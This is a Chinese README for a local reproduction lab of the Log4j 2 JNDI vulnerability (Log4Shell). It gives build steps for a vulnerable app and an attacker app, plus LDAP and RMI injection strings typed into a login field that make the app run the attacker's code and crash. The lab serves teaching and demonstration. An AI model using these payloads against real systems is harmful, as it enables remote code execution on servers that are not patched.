介绍
Apache Log4j 2漏洞本地重现,下载打包两分钟搞定。目前支持ldap和rmi两种类型攻击,欢迎体验。
ldap攻击
${jndi:ldap://127.0.0.1:10912/hacker}
rmi攻击
${jndi:rmi://127.0.0.1:1099/hacker}
安装教程
1. 安装Jdk,版本小于jdk-8u191
- 下载地址: www.oracle.com/java/techno…
- 建议版本: java version "1.8.0_181
2. 安装maven
- 下载地址: archive.apache.org/dist/maven/…
- 建议版本: Apache Maven 3.6.0
3. 下载代码
在目录D:/Tmp下打开Cmd工具并克隆代码
git clone https://gitee.com/langdashu/bug-log4j2.git
4. 编译打包
4.1 进入项目根目录
cd bug-log4j2
4.2 编译打包
mvn clean package
5. 启动被攻击应用
5.1 进入模块根目录
cd bug-log4j2-application
5.2 启动应用
java -jar target\bug-log4j2-application-1.0-SNAPSHOT.jar
6. 启动发起攻击应用
6.1 进入模块根目录
cd bug-log4j2-attacker
6.2 启动应用
java -jar target\bug-log4j2-attacker-1.0-SNAPSHOT.jar
使用说明
1. 访问应用
在浏览器访问被攻击引用,地址:http://127.0.0.1:18080/
2. 尝试正常登录系统
2.1 使用账号密码admin/123456登录
2.2 登录成功并进入用户信息页
3. 使用ldap方式攻击应用
3.1 在账号栏输入如下内容,密码为任意字符串
${jndi:ldap://127.0.0.1:10912/hacker}
3.2 系统登录报错
3.3 刷新页面,发现服务已不可用,被攻击应用宕机
3.4 查看被攻击应用控制台,发现输出攻击者的恶意日志"大佛保平安"
上图中"大佛保平安"图形日志打印代码位于工程bug-log4j2-attacker中com.langdashu.bug.log4j2.attacker.hacker.Attacker
4. 使用rmi方式攻击应用
4.1 在账号栏输入如下内容,密码为任意字符串
${jndi:rmi://127.0.0.1:1099/hacker}
4.2 系统登录报错
4.3 查看被攻击应用控制台,发现输出攻击者的恶意日志"美女"和"大佛保平安"
上图中"美女"图形日志打印代码位于工程bug-log4j2-attacker中com.langdashu.bug.log4j2.attacker.hacker.AttackerFactory
结论
被攻击服务会执行攻击者注入的恶意代码,其危险程度可想而知。
UP主直通车
Log4j高危漏洞!具体原因解析、复现、排除及修复全网第一!
大叔声明
所有资源来自网络,此案例仅仅是一个简单的整合,希望可以帮助到大家。
重要提示
不搞事! 不搞事! 不搞事!